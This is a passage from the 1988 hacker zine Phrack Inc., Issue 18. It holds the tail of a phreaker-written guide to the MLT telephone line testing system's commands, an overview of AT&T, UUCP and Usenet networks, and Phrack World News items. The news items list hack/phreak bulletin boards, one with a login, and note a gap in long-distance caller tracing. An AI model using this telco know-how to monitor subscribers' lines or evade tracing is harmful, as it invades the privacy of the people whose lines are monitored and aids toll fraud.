MDF trunk group from which MLT will choose an MDF trunk. Use the MDF(gr) request when the NPA-NXX that you are using has more than one frame associated with it and you can't enter cable and pair numbers. For example, to request MDF trunk group a, you should enter MDFA in the req field. To find out which trunk groups are available for your NPA-NXX you can either enter an mdf or an info request. Remember that you still have to call the frame attendant to have the trunk and line connected and also disconnect when you are finished. Mdfin: Test the inside part of a line Mdfin starts a series of tests that do an extensive analysis of the inside line. This includes line circuit and dial tone tests. The mdfin request uses a special line that runs from the MLT testing equipment to the MDF. You must ask the frame attendant to connect this line to the subscriber's line. Then you must enter the telephone number of this special line on the test mask along with mdfin and the subscriber's number. For more information see the mdfio module in the MLT-2 user guide. Mdfout: Test the outside part of a line Mdfout starts a series of tests that do an extensive analysis of the outside line. This includes the DC and AC tests. The mdfout request uses a special line that runs from the mlt testing equipment to the MDF. You must ask the frame attendant to connect this line to the subscriber's line. Then you must enter the telephone number of this special line on the test mask along with mdfin and the subscriber's number. Mon: Monitor a subscriber's line Mon lets you monitor a subscriber's line. Sometimes you are a better judge of whether there is noise, speech, or a recording on a line than MLT is. If you want to listen to a line to determine if one of these conditions does exist, use the mon request. You can also be automatically placed in the monitor mode by MLT in some cases. You will be put in monitor mode if you request ring, talk or psr but MLT thinks the line is busy, or if you must talk to the subscriber to run a rev, dial, or tt. A callback number is required. You can request quick, look, or full while in monitor mode. Psr: Release a permanent signal Psr attempts to release a permanent signal in a step-by-step central office. A permanent signal is a steady dial tone on a line. A frequent cause is a receiver that is off-hook. Psr lets you remove the permanent signal so that you can monitor for room noise. If when you monitor the line you still hear steady dial tone, you should suspect permanent signal on the line. Psr requires a callback path between your callback line and the subscriber's line. You should already have the callback path established before you enter a psr request. Qin: Run a quick series in toward the co Qin starts a series of tests that make a "quick" check of the loop toward the central office. It includes the same tests as quick. It can also identify a co line circuit if one is present and will report a line circuit if the DC resistances look like one is present. An MDF access is required for a qin request. You can use qin to test special switching machines. For example, if the circuit has 2 loops connected at the frame, qin lets you look at the 2nd loop (both full & loop only test toward one loop). Rev: Identify touch-tone polarity reversals Rev helps you identify a touch-tone polarity reversal. On a good line, the battery is connected to the ring wire and the ground is on the tip wire. These wires must be connected to specific terminals on the telephone. If they are reversed, the subscriber will be able to receive calls but will not be able to dial out. If the line is reversed, you won't be able to hear the tones before you enter a rev request. Rev only reserves the line temporarily. A callback path should be established before you make a rev request. Rin: Ring a subscriber's special services line Rin lets you ring a telephone on a special services line. A callback is required. If one doesn't exist, ring in sets one up for you. To answer the callback, answer its ring and press "0" on the touch-tone pad, and listen for ringing. When the subscriber answers, you will be placed in talk mode. If the line is busy, the call in progress will be interrupted. Use rin to contact the subscriber or a technician at the subscriber's home. MDF access is required to request rin. Ring(#): Ring a specific party on a multi-party line Ring(#) lets you choose the telephone that you want to ring on a multiparty line. A multiparty line is one on which more than one subscriber is connected to the same pair of wires. Normally MLT checks the line records of the telephone number you enter using the ring request, and automatically rings the correct party. When the line records indicate 2, 4, or 8 party, use the ring(#) request and specify the party number in place of the "#." If you request ring1, MLT rings the party connected to the ring side. If you request ring2, MLT rings the party connected on the tip side. Ring: Ring a subscriber's line Ring lets you ring a telephone on a single party line. A callback path is required but if one doesn't exist, ring sets one up for you. To answer your callback, answer its ring and press "0" on the touch-tone pad, and listen for ringing. When the subscriber answers, you will be placed in talk mode. If the line is busy or cannot be rung, you will be placed in monitor mode to listen for noise or speech. Use ring to contact the subscriber or a repair person at the subscriber's home. Ringer: Check ringer configuration on a line Ringer counts the number of ringers on each part of the loop (tip-ring, tip-ground, and ring-ground). The results tell you the number of telephones found by MLT. If there is a problem, the summary explains the problem. If you are testing a party line, some of the ringers found may belong to the other party. Rin: Ring a subscriber's special services line Rin lets you ring a telephone on a special services line. A callback is required. If one doesn't exist, ring-in sets one up for you. To answer the callback, answer its ring and press "0" on the touch-tone pad, and listen for ringing. When the subscriber answers, you will be placed in talk mode. If the line is busy the call in progress will be interrupted. Listen for noise of speech. Use rin to contact the subscriber or a technician at the subscriber's home. MDS is required to request rin. Soak: Identify swinging resistance condition Soak identifies unstable ground faults (swinging resistance) on a line. Voltage is applied to the line and a series of DC resistance measurements are made to see the effect of that voltage. If the resistance values are all low, the fault is probably stable. If even one value is 20% larger than the original measurement, the fault may be unstable (swinging). A repair person who is dispatched may have trouble locating a swinging fault. Use soak when you find a 10-1000 kohm ground on a q test (full & loop include the soak test), or just prior to dispatch to double-check a line's condition. Ssa: Special services access The ssa request is used to access non-locally switched customer telephone lines. Accessing these lines is a special case of a no-test trunk access. However, if they go through a digital loop carrier such as SLC Series 5, and there is special equipment available in the co, then you can test them with a no-test trunk special se rvices access. This means you don't have to call the trunk. The request can only be run from the stv mask. Stv: Special services trouble verification request The stv request changes you from a tv mask to an stv mask. Stv is used when you need to test special services circuits (non-locally switched lines) served by digital loop carrier systems such as SLC Series 5. Switching to the stv mask will not affect any information you left in the tv mask -- your status lines will remain the same; however, the middle section of the mask will be changed. Any request done from a tv mask can also be done from an stv mask, but not vice versa. The stv request can only be run from a tv mask. Take: Take control of a long-term access Take is used when you want to transfer a long-term access from someone else's terminal to your terminal. To take control of a no-test access, enter the telephone number that you want to transfer in the tn field. To transfer an MDF access to your terminal, enter the NPA-NXX in the tn field and the MDF number in the space to the right of the regular tn field of the tv mask. Finally, enter take in the req field. If the previous holder had a callback established, it would not be remover. If necessary, you must remove the callback using xcb and request a new callback to your telephone. Talk: Talk over the subscriber's line Talk lets you talk to either a subscriber or a repair person on a subscriber's line. Talk does not ring the line so there must be someone waiting to talk to you on the other end of the line. A callback path is required for the talk request but if one does not already exist, talk will set one up for you if you have a callback number entered. If the line is already accessed before the talk request, MLT enters a "t" and the last 2 digits of the callback number under the callback heading and updates the time since access. You can request quick, loop, or full while in talk mode. Talkin: Talk over the subscriber's special services line Talkin lets you talk to a subscriber or a repair person on a special services line. Talkin does not ring the line so there must be someone waiting to talk to you on the other end of the line. A callback path is required for the talkin request but if one does not already exist, talkin sets one up for you if you have a callback number entered. If the line is already accessed before the talkin request, MLT enters a "t" and the last 2 digits of the callback number under the callback heading and updates the time since access. You must have an MDF access to request talkin. Tone+: Use loud tone to help identify a pair Tone+ puts a high amplitude tone on a line. It is used on pairs that are very long. The extra amplitude helps the repair-person hear the tone over long distances. Tone is used to help a repair person to locate the correct pair in a cable with many pairs of wires in it. Use tone+ when a repair person requests a tone on a very long pair. If you have a callback on the line, it will be placed in monitor mode. If the status line gets brighter & you get a changed state message, it means 1) The repair person found the pr & wants to talk to you or 2) The subscriber has gone off-hook. Tone: Use tone to help craft identify a pair Tone puts a metallic tone on a line. There may be many pairs in a single cable, making it difficult for a repair person to locate a specific line. The tone makes this job easier. Before MLT places a tone on a line it does a test. The results tell you if there is a fault on the line. If there is a callback on the line when you request a tone, it will be placed in monitor mode. If the status line gets brighter and you get a changed state message, it means either 1) The repair person found the pr & wants to talk to you or 2) The subscriber has gone off-hook. Toneca: Use tone to help identify a cable Toneca puts a longitudinal tone on a line. This tone helps the repair person find the cable binder group that the pair is in. The repair person finds the correct cable by listening for the tone. Because the tone can be heard on pairs other than the one you put it on, when tone or tone+ are inappropriate. If the repair person does not have time to find the cable on the first try, you can repeat the request. Before placing the tone on the line, MLT does a pretest and tells you if there is a fault on the line. Tonein: Use tone to help a technician identify a special services pair Tonein puts a metallic tone on a special services line. It may be difficult for a technician to locate a specific line. The tone makes this job easier. Before MLT places a tone on a line it does a pretest. An MDF access is required in order to request a tonein. If a callback is on the line when you request tonein, it is placed in monitor mode. If the status line gets brighter and you get a changed state message, it means either 1) The repair person found the pr & wants to talk to you or, 2) The subscriber has gone off-hook. Tt: Test the subscriber's touch-tone pad Tt checks a subscriber's touch-tone pad. It analyzes the tones produced when the subscriber presses the button before you make a tt request. You in the sequence 1 through 0. You must instruct the subscriber to press the buttons after hearing dial tone. Mlt will signal you over your headset with two beeps if the pad is good or one or no beeps if it is bad. A callback path should be established before you make a tt request. You must use a no-test trunk access to request it. You can use the ring request to contact the subscriber and set up a callback. Tv: Trouble verification request The tv request changes you from an stv mask to a tv mask. Tv is used when you need to do interactive testing of locally switched telephone lines, or tests using an MDF trunk. Switching to the tv mask will not affect any information you left in the stv mask -- your status lines will remain the same; however, the middle section of the mask will be changed. Any request done from a tv mask can also be done from an stv mask, but not vice versa. The request can only be run from a stv mask. Ver##: Get definition and example of a ver code Ver## gives you a description of the ver code that you type in place of the ##. For example, a ver22 request will give you a definition of verification code number 22 and an example of a typical set of test results that might accompany a ver code of 22. Use this request whenever you can't remember what a certain ver code means. MLT stores your tv mask when you request ver code information. Ver: Test the entire telephone line Ver starts a series of tests that do an extensive analysis of the entire line. This includes both the inside and outside portions. Many individual tests are run but only the ver code and summary messages are displayed. Outside, MLT checks for AC and DC faults. Inside, it checks the line circuit and dial tone. Thanks to AT&T and the Bell Operating Companies. Control C and The Tribunal of Knowledge If you have any questions or comments contact: Control C Jack Death Prime Suspect The Prophet The Urvile Or any other member of the TOK. ============================================================================== ==Phrack Inc.== Volume Two, Issue 18, Phile #9 of 11 The Tribunal of Knowledge presents.. A Few Things About Networks =========================== Brought to you by Prime Suspect (TOK) June 1, 1988 Seems like if you're into hacking you sometime or another run into using networks, whether it be Telenet, Tymnet, or one of the Wide Area Networks. One popular Network that hackers have used for some time is Arpanet. Arpanet has been around for quite a long time. There are changes made to it almost daily and the uses of it are much more than just logging into other systems. Many college students find themselves getting acquainted with Bitnet these days. Bitnet is SO new compared to other networks that it's got a lot of potential left. There is much more to it then just mail and file transfers. There are interactive uses such as the RELAY for real-time discussion with others (equivalent to a CB mode) and another popular use is the network information center to receive technical files about networking. There are many many mail addresses that are used for database searching, and subscribing to electronic magazines. You will find these same uses on other Wide Area Networks also. I will give you 3 related network areas. These three areas include: The AT&T company networks, UUCP, and Usenet cooperative networks. Please note that some of the information I gathered for this file dated back to 1986. But I tried to keep it as current as possible. AT&T (Company Network) ---------------------- AT&T has some internal networks, most of which use internally developed transport mechanisms. Their most widely used networks are UUCP and USENET, which are not limited to that corporation and which are discussed later. All internal AT&T networks support UUCP-style h1!h2!h!u source routing syntax and thus appear to the user to be UUCP. Within AT&T, UUCP links are typically over 1,200-bps dial-up telephone lines or Datakit (see below). Among AT&T's other networks, CORNET is an internal analog phone network used by UUCP and modems as an alternative to Direct Distance Dialing (DDD). Datakit is a circuit-switched digital net and is similar to X.25 in some ways. Most of Bell Laboratories is trunked together on Datakit. On top of DK transport service, people run UUCP for mail and dkcu for remote login. In addition to host-to-host connections. Datakit supports RS232 connections for terminals, printers, and hosts. ISN is the version of Datakit supported by AT&T Information Systems. Bell Laboratories in Holmdel, New Jersey, uses ISN for internal data communication. BLICN (Bell Labs Interlocation Computing Network) is an IBM mainframe RJE network dating from the early 1970s when Programmer's Workbench (PWB) was a common version of the UNIX operating system. Many UNIX machines with PWB-style RJE links use BLICN to queue mail and netnews for other UNIX machines. A major USENET host uses this mechanism to feed news to about 80 neighbor hosts. BLICN covers Bell Laboratories installations in New Jersey, Columbus, Ohio, and Chicago, and links most computer center machines. BLN (Bell Labs Network) is an NSC Hyperchannel at Indian Hill, Chicago. AT&T Internet is a TCP/IP internet. It is not a major AT&T network, though some of the best-known machines are on it. There are many ethernets connected by TCP/IP over Datakit. This internet may soon be connected to the ARPA Internet. ACCUNET is AT&T's commercial X.25 network. AT&T MAIL is a commercial service that is heavily used within AT&T Information Systems for corporate internal mail. UUCP (Cooperative Network) -------------------------- The name "UUCP," for Unix to Unix CoPy, originally applied to a transport service used over dial-ups between adjacent systems. File transfer and remote command execution were the original intent and main use of UUCP. There was an assumption that any pair of communicating machines had direct dial-up links, that is, that no relaying was done through intermediate machines. By the end of 1978, there were 82 hosts within Bell Laboratories connected by UUCP. Though remote command execution and file transfer were heavily used, there is no mention of mail in the standard reference. There was another similar network of "operational" hosts with UUCP links that were apparently outside Bell Laboratories, but still within the Bell System. The two networks intersected at one Bell Laboratory machine. Both of these early networks differed from the current UUCP network in assuming direct connections between communicating hosts and in not having mail service. The UUCP mail network proper developed from the early networks and spread as the UUCP programs were distributed as part of the Unix system. Remote command execution can be made to work over successive links by arranging for each job in the chain to submit the next one. There are several programs that do this: Unfortunately, they are all incompatible. There is no facility at the transport level for routing beyond adjacent systems or for error acknowledgement. All routing and end-to-end reliability support is done explicitly by application protocols implemented using the remote command execution facility. There has never been any remote login facility associated with UUCP, though the cu and tip programs are sometimes used over the same telephone links. The UUCP mail network connects a very diverse set of machines and users. Most of the host machines run the UNIX operating system. Mail is the only service provided throughout the network. In addition to the usual uses of mail, much traffic is generated as responses to USENET news. The same underlying UUCP transport mechanisms are also used to support much of USENET. The UUCP mail network has many problems with routing (it is one of the few major networks that uses source routing) and with its scale. Nonetheless, it is extremely popular and still growing rapidly. This is attributable to three circumstances: ease of connection, low cost, and its close relationship with the USENET news network. Mailing lists similar to those long current on the ARPANET have recently increased in popularity on the UUCP mail network. These permit a feature that USENET newsgroups cannot readily supply: a limitation on access on a per-person basis. Also, for low-traffic discussions mailing lists are more economical, since traffic can be directed to individuals according to their specific interests. There is no central administration. To connect to the network, one need only find one machine that will agree to be a neighbor. For people at other hosts to be able to find your host, however, it is good to be registered in the UUCP map, which is kept by the group of volunteers known as the UUCP Project. The map is posted monthly in the USENET newsgroup "comp.mail.maps". There is a directory of personal addresses on the UUCP network, although this is a commercial venture unrelated to the UUCP Project. Each host pays for it's own links; some hosts encourage others to connect to them in order to shorten mail delivery paths. There is no clear distinction between transport and network layers in UUCP, and there is nothing resembling an Internet Protocol. The details of the transport protocol are undocumented (apparently not actually proprietary to AT&T, contrary to rumor, though the source code that implements the protocol and is distributed with UNIX is AT&T's trade secret). Mail is transferred by submitting a mail command over a direct connection by the UUCP remote command execution mechanism. The arguments of the mail command indicate whether the mail is to be delivered locally on that system or resubmitted to another system. In the early days, it was necessary to guess the route to a given host and hope. The only method of acknowledgment was to ask the addressee to reply. Now there is a program (pathalias) that can compute reasonable routes from the UUCP map, and there is software that can automatically look up those routes for users. The UUCP mail network is currently supported in North America mostly by dial-up telephone links. In Europe there is a closely associated network called EUnet, and in Japan there is JUNET. The most common dial-up link speed on the UUCP mail network is 1,200 bps though there are still a few 300-bps links, and 2,400 bps is becoming more popular. Actually, now I believe that 1200-bps is still very common, but 2400 may be just as common, and 9600-bps is much more common than ever thought it would be in 1986. There are also many sites that use 19,200-bps for using UUCP. When systems are very close, they are sometimes linked by dedicated lines, often running at 9,600 bps. Some UUCP links are run over local-area networks such as ethernets, sometimes on top of TCP/IP (though more appropriate protocols than UUCP are usually used over such transport media, when UUCP is used it's usual point-to-point error correction code is bypassed to take advantage of the reliability of the underlying network and to improve bandwidth). Some such links even exist on long-haul packet networks. The widespread use of more sophisticated mail relay programs (such as sendmail and MMDF) has increased reliability. Still, there are many hosts with none of these new facilities, and the sheer size of the network makes it unwieldly. The UUCP mail network has traditionally used source code routing with a syntax like hosta!hostb!hostc!host!user. The UUCP map and pathalias have made this bearable, but it is still a nuisance. An effort is underway to alleviate the routing problems by implementing naming in the style of ARPA Internet domains. This might also allow integration of the UUCP name space into the ARPA Internet domain name space. In fact there is now an ATT.COM domain in which most hosts are only on UUCP or CSNET. Most UUCP hosts are not yet in any Internet domain, however. This domain effort is also handled by the UUCP Project and appears to be proceeding at a methodical but persistent pace. The hardware used in the UUCP mail network ranges from small personal computers through workstations to minicomputers, mainframes and super- computers. The network extends throughout most of North America and parts of Asia (Korea and Israel). Including hosts on the related networks JUNET (in Japan) and EUnet (in Europe), there are at least 7,000 hosts on the network; possibly 10,000 or more. (EUnet and JUNET hosts are listed in the UUCP maps.) The UUCP Project addresses are: uucp-query@cbatt.ATT.COM cbatt!uucp-query uucp-query@cbatt.UUCP Much information about UUCP is published in USENET newsgroups. USENET (Cooperative Network) ---------------------------- USENET began in 1980 as a medium of communication between users of two machines, one at the University of North Carolina, the other at Duke University. It has since grown exponentially to its current size of more than 2000 machines. In the process, the software has been rewritten several times, and the transport mechanisms now used to support it include not only the original UUCP links, but also X.25, ACSNET, and others. USENET combines the idea of mailing lists as long used on the ARPANET with bulletin-board service such as has existed for many years on TOPS-20 and other systems, adding a freedom of subject matter that could never exist on the ARPANET, and reaching a more varied constituency. While chaotic and inane ramblings abound, the network is quite popular. The USENET news network is a distributed computer conferencing system bearing some similarities to commercial conferencing systems like CompuServe, though USENET is much more distributed. Users pursue both technical and social ends on USENET. Exchanges are submitted to newsgroups on various topics, ranging from gardening to astronomy. The name "USENET" comes from the USENIX Association. The Professional and Technical UNIX User's Group. The name UNIX is a pun on Multics, which is the name of a major predecessor operating system. (The pun indicates that, in areas where Multics tries to do many things, UNIX tries to do one thing well.) USENET has no central administration, though there are newsgroups to which introductory and other information about the network is posted monthly. USENET is currently defined as the set of hosts receiving the newsgroup news.announce. There are about a dozen hosts that constitute the backbone of the network, keeping transit times low by doing frequent transfers among themselves and with other hosts that they feed. Since these hosts bear much of the burden of the network, their administrators tend to take a strong interest in the state of the network. Most newsgroups can be posted to by anyone on the network. For others, it is necessary to mail a submission to a moderator, who decides whether to post it. Most moderators just filter out redundant articles, though some make decisions on other grounds. These newsgroup moderators form another group interested in the state of the network. Newsgroups are created or deleted according to the decisions made after the discussion in the newsgroup "news.groups". Each host pays its own telephone bills. The backbone hosts have higher bills than most other hosts due to their long-distance links among themselves. The unit of communication is the news article. Each article is sent by a flooding routing algorithm to all nodes on the network. The transport layer is UUCP for most links, although many others are used, including ethernets, berknets, and long-haul packet-switched networks; sometimes UUCP is run on top of the others, and sometimes UUCP is not used at all. The many problems with USENET (e.g. reader overload, old software, slow propagation speed, and high and unevenly carried costs of transmission) have raised the possibility of using the experience gained in USENET to design a new network to replace it. The new network might also involve at least a partial replacement for the UUCP mail network. One unusual mechanism that has been proposed to support the new network is stargate. Commercial television broadcasting techniques leave unused bandwidth in the vertical blanking interval between picture frames. Some broadcasters are currently using this part of the signal to transmit Teletext services. Since many cable-television channels are distributed via geo-synchronous satellites, a single input to a satellite uplink facility can reach all of North America on an appropriate satellite and channel. A satellite uplink company interested in allowing USENET-like articles to be broadcast by satellite on a well-known cable-television channel has been found. Prototypes of hardware and software to encode the articles and other hardware to decode them from a cable-television signal have been built and tested in the field for more than a year. A new, reasonably price model of the decoding box may be available soon. This facility would allow most compatible systems within the footprint (area of coverage) of the satellite and with access to the appropriate cable- television channel to obtain decoding equipment and hook into the network at a very reasonable cost. Articles would be submitted for transmission by UUCP links to the satellite uplink facility. Most of the technical problems of Stargate seem to have been solved. More than 90 percent of all USENET articles reach 90 percent of all hosts on the network within three days. Though there have been some famous bugs that caused loss of articles, that particular problem has become rare. Every USENET host has a name. That host name and the name of the poster are used to identify the source of an article. Though those hosts that are on both the UUCP mail and USENET news networks usually have the same name on both networks, mail addresses have no meaning on USENET: Mail related to USENET articles is usually sent via UUCP mail; it cannot be sent over USENET, by definition. Though the two networks have always been closely related, there are many more hosts on UUCP than on USENET. In Australia the two networks do not even intersect except at one host. There are different distributions of newsgroups on USENET. Some go everywhere, whereas others are limited to a particular continent, nation, state or province, city, organization, or even machine, though the more local distributions are not really part of USENET proper. The European network EUnet carries some USENET newsgroups and has another set of it's own. JUNET in Japan is similar to EUnet in this regard. There are about 2000 USENET hosts in the United States, Canada, Australia, and probably in other countries. The hosts on EUnet, SDN, and JUNET communicate with USENET hosts: The total number of news hosts including ones on those three networks is probably at least 2500. The UUCP map includes USENET map information as annotations. A list of legitimate netwide newsgroups is posted to several newsgroups monthly. Volunteers keep statistics on the use of the various newsgroups (all 250 of them) and on frequency of posting by persons and hosts. These are posted to news.newslists once a month, as is the list of newsgroups. Important announcements are posted to moderated newsgroups, news.announce and news.announce.newusers, which are intended to reach all users (the current moderator is Mark Horton, cbosgd!mark). An address for information on the network is seismo!usenet-request. News on UUNET - June 1988 ------------------------- A year ago, UUNET (Fairfax, VA) was formed to help ease the communication load of the beleaguered Usenet network of UNIX users. Usenet connections were becoming increasingly costly and difficult to maintain, a situation that prompted the Usenix Association to fund the creation of the UUNET Communications Service to assist users in accessing Usenet. Now, UUNET has become the "best connected" UNIX computer in the world, and has been authorized to function as an Arpanet mail gateway. Gateways to other networks are expected to be established in the future. I guess all use of UUNET is done through the UUCP program found on Unix operating systems. Many people are getting PC versions of the Unix Operating system now-a-days, so knowing what's available before getting hooked into a network, if that's your plan, is advised. There is an advertisement about UUNET on Bix in the networks conference somewhere. The message may be old, but still useful. The cost of using UUNET is: $30/month... and $2/hour. I think the hourly charge may only apply if connecting through Tymnet. Not sure. Accessible via Tymnet, their 800 number, or a regular local POTS number. Connections can definitely be made up to 9600 baud. 19.2K baud access may also exist. I think it does. If you're a UUNET user, and want to receive mail from someone through the UUCP network, they would address it just as any other UUCP mail address. An example is: ...uunet!warble!joeuser ------------------------------------------------------------------------------ This file has been brought to you by Prime Suspect and Tribunal of Knowledge ============================================================================== ==Phrack Inc.== Volume Two, Issue 18, Phile #10 of 11 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN >>>>>=-* Phrack World News *-=<<<<< PWN PWN Issue XVIII/1 PWN PWN PWN PWN Created, Compiled, and Written PWN PWN By: Epsilon PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Intro ===== Welcome to yet another issue of Phrack World News. We have once again returned to try and bring you an entertaining, and informative newsletter dedicated to the spread of information and knowledge throughout the H/P community. ______________________________________________________________________________ TOK Re-Formed ============= A group called Tribunal Of Knowledge, which has undergone previous re-formations has once again re-formed. The person who is currently "in charge" of the group says that he had permission from High Evolutionary, the group's founder, to re-form the organization. Although the group hasn't publicly announced their existence or written any files, we should be hearing from them in the near future. The Current Members of TOK Include - Control C Prime Suspect Jack Death The UrVile The Prophet Psychic Warlord Information Provided By Control C, and Prime Suspect. ______________________________________________________________________________ Phrack Inc. Support Boards ========================== Phrack Inc. has always made it a habit to set up Phrack Inc. sponsor accounts on the more popular boards around. These sponsor accounts are set up, so that the users may get in touch with the Phrack Magazine staff if they would like to contribute an article, or any other information to our publication. Please take note of the boards on which Phrack Inc. accounts are set up. Thank you. The Current List of Phrack Inc. Sponsor Boards Includes - P-80 Systems - 304/744-2253 OSUNY - 914/725-4060 The Central Office - 914/234-3260 Digital Logic's DS - 305/395-6906 The Forgotten Realm - 618/943-2399 * * - Phrack Headquarters ______________________________________________________________________________ SummerCon '88 Preliminary Planning ================================== Planning for SummerCon '88 is underway. So far, we have decided on four tentative locations: New York City, Saint Louis, Atlanta, or Florida. Since this is only tentative, no dates have been set or reservations made for a conference. If you have any comments, suggestions, etc, please let us know. If you are planning to attend SummerCon '88, please let us know as well. Thank you. Information Provided By The Forgotten Realm. ______________________________________________________________________________ LOD/H Technical Journal ======================= Lex Luthor of LOD/H (Legion of Doom/Hackers) has been busy with school, etc., so he has not had the time, nor the initiative to release the next issue of the LOD/H Technical Journal. On this note, he has tentatively turned the Journal over to Phantom Phreaker, who will probably be taking all contributions for the Journal. No additional information is available. Information Provided By The UrVile and Phantom Phreaker. ______________________________________________________________________________ Congress To Restrict 976/900 Dial-A-Porn Services ================================================= Congress is considering proposals to restrict dial-up services in an effort to make it difficult for minors to access sexually explicit messages. A House-Senate committee is currently negotiating the "dial-a-porn" proposal. Lawmakers disagree whether or not the proposal is constitutional and are debating the issue of requiring phone companies to offer a service that would allow parents, free of charge, to block the 976/900 services. Other proposals would require customers to pay in advance or use credit cards to access the 976/900 services. Some companies are currently offering free services that restrict minors from accessing sexually explicit messages. AT&T and Department of Justice officials are cooperating in a nationwide crackdown of "dial-a-porn" telephone companies. The FCC recently brought charges against one of AT&T's largest 900 Service customers, and AT&T provided the confidential information necessary in the prosecution. AT&T also agreed to suspend or disconnect services of companies violating the commission ban by transmitting obscene or indecent messages to minors. ______________________________________________________________________________ Some Hope Left For Victims Of FGD ================================= US Sprint's famed FGD (Feature Group D) dial-ups and 800 INWATS exchanges may pose no threat to individuals under switches that do not yet offer equal access service to alternate long distance carriers. Due to the way Feature Group D routes its information, the ten-digit originating number of the caller is not provided when the call is placed from a non-equal access area. The following was taken from an explanation of US Sprint's 800 INWATS Service. ************************************************************* CALL DETAIL ************************************************************* With US Sprint 800 Service, a customer will receive call detail information for every call on every invoice. The call detail for each call includes: o Date of call o Time of call o The originating city and state o The ten-digit number of the caller if the call originates in an equal access area or the NPA of the caller if the non-equal access area. o Band into which the call falls o Duration of the call in minutes o Cost of the call This came directly from US Sprint. Do as you choose, but don't depend on this. Information Provided by US Sprint. ______________________________________________________________________________ Telenet Bolsters Network With Encryption ======================================== Telenet Communications Corporation strengthened its public data network recently with the introduction of data encryption capability. The X.25 Encryption Service provides a type of data security previously unavailable on any public data network, according to analysts. For Telenet, the purpose of the offering is "to be more competitive; nobody else does this," according to Belden Menkus, an independent network security consultant based in Middleville, NJ. The service is aimed at users transmitting proprietary information between host computers, such as insurance or fund-transfer applications. It is priced at $200 per month per host computer connection. Both the confidentiality and integrity of the data can be protected via encryption. The scheme provides end-to-end data encryption, an alternative method whereby data is decrypted and recrypted at each node in the network. "This is a recognition that end-to-end encryption is really preferable to link encryption," Menkus said. The service is available over both dial-up and leased lines, and it supports both synchronous and asynchronous traffic at speeds up to 9.6K BPS. Telenet has approved one particular data encryption device for use with the service, The Cipher X 5000, from Technical Communications Corporation (TCC), a Concord, Massachusetts based vendor. TCC "has been around the data encryption business for quite a while," Menkus said. The Cipher X implements the National Bureau of Standards' Data Encryption Standard (DES). DES is an algorithm manipulated by a secret 56 bit key. Computers protected with the device can only be accessed by users with a matching key. The data encryptor is installed at user sites between the host computer and the PAD (Packet Assembler/Disassembler). Installation of the TCC device does not affect the user's ability to send non-encrypted data, according to Telenet. By maintaining a table of network addresses that require encryption, the device decides whether or not to encrypt each transmission. Information Provided by Network World. ______________________________________________________________________________ ============================================================================== ==Phrack Inc.== Volume Two, Issue 18, Phile #11 of 11 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN >>>>>=-* Phrack World News *-=<<<<< PWN PWN Issue XVIII/2 PWN PWN PWN PWN Created By Knight Lightning PWN PWN PWN PWN Compiled and Written PWN PWN by Epsilon PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Intro ===== It seems that there is yet some things to be covered. In addendum, we will be featuring, as a part of PWN, a special section where up-and-coming H/P Bulletin Boards can be advertised. This will let everyone know where the board scene stands. If you have a board that you feel has potential, but doesn't have good users, let us know. Thanks. ______________________________________________________________________________ Doctor Cypher Busted? ===================== Doctor Cypher, who frequents the Altos Chat, The Dallas Hack Shack, Digital Logic's Data Service, The Forgotten Realm, P-80 Systems, and others, is believed to have had his modem confiscated by "Telephone Company Security," and by his local Sheriff. No charges have been filed as of this date. He says he will be using a friend's equipment to stay in touch with the world. Information Provided by Hatchet Molly ______________________________________________________________________________ Give These Boards A Call ======================== These systems have potential, but need good users, so give them a call, and help the world out. The Autobahn - The Outlet Private - 703/629-4422 313/261-6141 Primary - 'central' newuser/kenwood Sysop - The Highwayman Sysop - Ax Murderer Hack/Phreak Private Hack/Phreak Dallas Hack Shack - The Forgotten Realm - 214/422-4307 618/943-2399 Apply For Access Apply For Access Sysop - David Lightman Sysop - Crimson Death Private Hack/Phreak Private H/P & Phrack Headquarters ______________________________________________________________________________ AllNet Hacking Is Getting Expensive =================================== For those of you who hack AllNet Long Distance Service, watch out. AllNet Communications Corp. has announced that they will be charging $500.00 PER ATTEMPT to hack their service. That's not PER VALID CODE, that's PER ATTEMPT. Sources say that The Fugitive (619) received a $200,000.00 phone bill from AllNet. This may set examples for other long distance communication carriers in the future, so be careful what you do. ______________________________________________________________________________ Editorial - What Is The Best Way To Educate New Hackers? ======================================================== Since the "demise" of Phreak Klass 2600 and PLP, the H/P world has not seen a board dedicated to the education of new hackers. Although PK2600 is still up (806/799-0016, educate) many of the old "teachers" never call. The board has fallen mainly to new hackers who are looking for teachers. This may pose a problem. If boards aren't the way to educate these people (I think they are the best way, in fact), then what is? Certainly not giant Alliance conferences as in the past, due to recent "black-listing" of many "conferees" who participated heavily in Alliance Teleconferencing in the past. I think it might be successful if someone was able to set up another board dedicated to teaching new hackers. A board which is not private, but does voice validate the users as they login. Please leave some feedback as to what you think of this idea, or if you are willing to set this type of system up. Thanks. ______________________________________________________________________________ US Sprint Employee Scam ======================= The US Sprint Security Department is currently warning employees of a scam which could be affecting them. An unidentified man has been calling various employees throughout the US Sprint system and telling them that if they give him their FON Card numbers, they will receive an additional US Sprint employee long-distance credit. The Security Department says, "this is a 100 percent scam." "If you're called to take part in this operation, please call the Security Department at (816)822-6217." Information Provided By US Sprint ______________________________________________________________________________